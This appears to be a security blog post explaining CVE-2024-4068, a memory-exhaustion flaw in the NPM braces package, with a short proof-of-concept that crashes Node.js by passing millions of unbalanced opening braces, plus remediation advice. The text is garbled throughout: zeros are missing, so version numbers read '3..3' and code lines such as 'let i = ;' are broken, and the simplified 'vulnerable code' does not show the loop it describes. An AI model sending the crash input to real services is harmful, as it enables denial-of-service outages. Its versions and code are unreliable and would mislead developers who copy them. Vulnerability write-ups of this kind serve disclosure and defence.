CVE CyberSecurity Database News

CVE-2024-4068 - How the NPM Package `braces` Turned Into a Memory Bomb

Poster -

If you use the popular NPM package braces to expand or parse patterns in your Node.js projects, this vulnerability could put your server (or any sensitive automation) at risk of a simple crash – just by sending a weird string. Here’s a full breakdown, a code sample, and the details you won’t find anywhere else.

Summary

The braces package, before version 3..3, does not properly check the number of characters it can handle when parsing input. If an attacker sends a specially crafted string with “imbalanced braces” (for example, {a... without a closing brace), braces goes into an infinite loop. The loop keeps allocating more and more heap memory, without ever freeing it. Eventually, Node.js hits its memory ceiling and the process crashes.

This is tracked as CVE-2024-4068.

Where’s the Vulnerable Code?

The vulnerable part lives in lib/parse.js. Here, input is parsed to look for balanced braces and tokens. If the code hits a string where braces don't close, it keeps running – and eating memory – far longer than it should.

Vulnerable Code Snippet (simplified)

// lib/parse.js (before version 3..3)
function parse(input) {
  let i = ;
  let openBraces = ;

  while (i < input.length) {
    if (input[i] === '{') openBraces++;
    if (input[i] === '}') openBraces--;

    // This fails to check for imbalanced braces or early EOF
    // so an input like "{a" causes openBraces to stay >
    // The function keeps running, allocating memory for each char
    i++;
  }

  if (openBraces !== ) {
    // supposed to handle errors, but fails for long inputs
    // Omitted: actual error handling doesn't stop heap allocation elsewhere
  }
}

How Can This Be Exploited?

If your Node.js program uses braces to process user input, an attacker can easily send a payload with hundreds of thousands of opening braces with no matching closing braces.

This can be as simple as

const braces = require('braces');
const malicious = '{'.repeat(10_000_000); // 10 million opening braces

braces(malicious); // Will cause heap memory to fill up

You can test it yourself – but save your other work first! On most machines, running this code will *crash* Node.js by hitting its memory allocation limit, like this:

FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
 1: x10489c4e8 node::Abort()
 2: x10489c5cd node::OnFatalError(char const*, char const*)
 ...

Here’s a complete script that demonstrates the crash

const braces = require('braces'); // Install braces@3..2 or lower to see the bug

try {
  console.log('Sending huge malicious input...');
  braces('{'.repeat(1_000_000)); // You can crank this higher for a faster crash
} catch (error) {
  console.error('Caught exception:', error);
}

Real-World Impact

- DoS attacks: Any service using braces for processing user-supplied patterns (file renaming, search tools, globbing) can be taken down with low effort.
- Automated bots: Sometimes bots scrape webpages or monitor files. If these use braces on untrusted input, you could kill or disrupt automation for hours.
- CLI tools: Many CLI utilities depend on braces. A poisoned config, or malicious file, could break local developer tools.

The Fix

Patched in v3..3:
The developers improved input validation. Now the package checks for imbalanced braces, limits input length, and safely throws errors when it sees suspicious input.

Reference:
- Official Security Advisory
- Release notes

Update your dependencies

npm install braces@latest

Or, in your package.json, make sure you require at least 3..3

"dependencies": {
  "braces": "^3..3"
}

Conclusion

CVE-2024-4068 is a perfect example of why input validation and resource controls matter, even in utility libraries. A simple missing check in braces turned innocent pattern parsing into a memory time bomb. If you use braces, upgrade *right now* to version 3..3 or above – or your process might crash just because someone sent a funky string.


Share this with any developer still on an old version of braces — it could save their project from an angry memory leak!

Timeline

Published on: 05/14/2024 15:42:48 UTC
Last modified on: 07/03/2024 02:07:03 UTC